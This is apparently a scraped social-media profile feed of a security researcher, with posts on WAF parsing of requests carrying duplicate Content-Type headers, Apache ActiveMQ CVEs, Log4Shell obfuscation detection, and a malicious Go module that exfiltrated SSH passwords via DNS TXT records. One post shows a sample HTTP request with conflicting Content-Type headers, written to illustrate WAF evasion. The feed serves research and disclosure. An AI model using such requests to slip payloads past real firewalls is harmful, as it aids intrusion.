Security researcher with over a decade of experience in network&application&cloud security. Speaker at BlackHat, HITB, CanSecWest and TyphoonCon.
Joined February 2016
- Tweets 1,055
- Following 720
- Followers 15,011
- Likes 4,695
289 Photos and videos
Amazing vibe! Really impressive experience !
2
15
3,296
Hacking Google with A.I. for $500,000
brutecat.com/r/hacking-googl…
58
496
2,445
317,592
I know that for sure. However, even when a Content-Length header is present, inconsistencies in the Content-Type header can still create problems. Some WAFs, such as F5 BIG-IP, may treat such requests as protocol non-compliant and refuse to forward them to the upstream application.
The concern is that with this type of “chaotic” request, forwarding it can introduce security risks regardless of whether the WAF chooses the first or the second interpretation.
For example, if the WAF parses and validates the request as application/x-www-form-urlencoded while the upstream application interprets it as application/json, discrepancies in request processing may arise, potentially leading to security issues. The reverse scenario is equally problematic.
ALT F5-BIGIP
May 30
That's correct but it's missing the content length because the focus of the post was the duplicate headers. It's not meant to be used verbatim.
2
1
27
6,399
Regarding the ApacheMQ vulnerabilities we reported, one was dismissed as not a security issue because its root cause lies in Xstream, which now whitelists only java.lang.String for deserialization.
This post strongly warns you about configuring systems in untrusted environments.
Jun 2
Apache ActiveMQ is having a rough month. Two more CVEs.
⚠️ CVE-2026-42253 - HTTP Response Header Injection via JMS Message Properties
⚠️ CVE-2026-42588 - RCE via Jolokia addNetworkConnector
The Jolokia one is the scary one - default access policy permits exec operations on all ActiveMQ MBeans.
Fix: upgrade to 5.19.7 or 6.2.6.
VulnTracker.io
2
2
19
4,311
This kind of abnormal HTTP request is related to protocol compliance with the RFC specifications. For example, Akamai WAF even rejects POST requests that do not include a Content-Length header.
May 29
POST /api/update HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Type: application/json
{"test": true}
2
1
17
5,762
If you have any Log4Shell obfuscated variants for WAF bypass, please let me know — my detection approach can normalize and reconstruct all of them😆
x.com/pyn3rd/status/19994534…
May 29
Hey bug bounty hunters 👋Apache log4j is not dead. Before you skip Apache log4j targets in 2026 — read this : pingback.sh/article-log4j-20…
We documented exactly where, how, and how to report it clean.Drop everything and read:
#BugBounty #Log4Shell #BugBountyTips
1
6
64
10,127
pyn3rd retweeted
May 28
🌪️ Now on stage @pyn3rd revealing the hidden attack surface ClickHouse
2
3
14
10,031
Just arrived in Seoul for @typhooncon!
Not only is this my first time attending the conference, but it’s also my first time in Korea. Really loving the vibe already! 🇰🇷
3
38
3,221
More than a year ago, I shared a sneaky type of backdoor that steals SSH passwords and exfiltrates them through DNS TXT records.Looks like my tweets have been on a #SupplyChain poisoner’s radar ever since. 😅
x.com/pyn3rd/status/18548791…
Security researchers have exposed a malicious Go module backdoor hidden inside the shopsprint/decimal package that executes code using stealthy DNS TXT records.
#SupplyChainAttack #GoLang #CybersecurityNews #AppSec #Malware
securityonline.info/maliciou…
1
2
12
4,094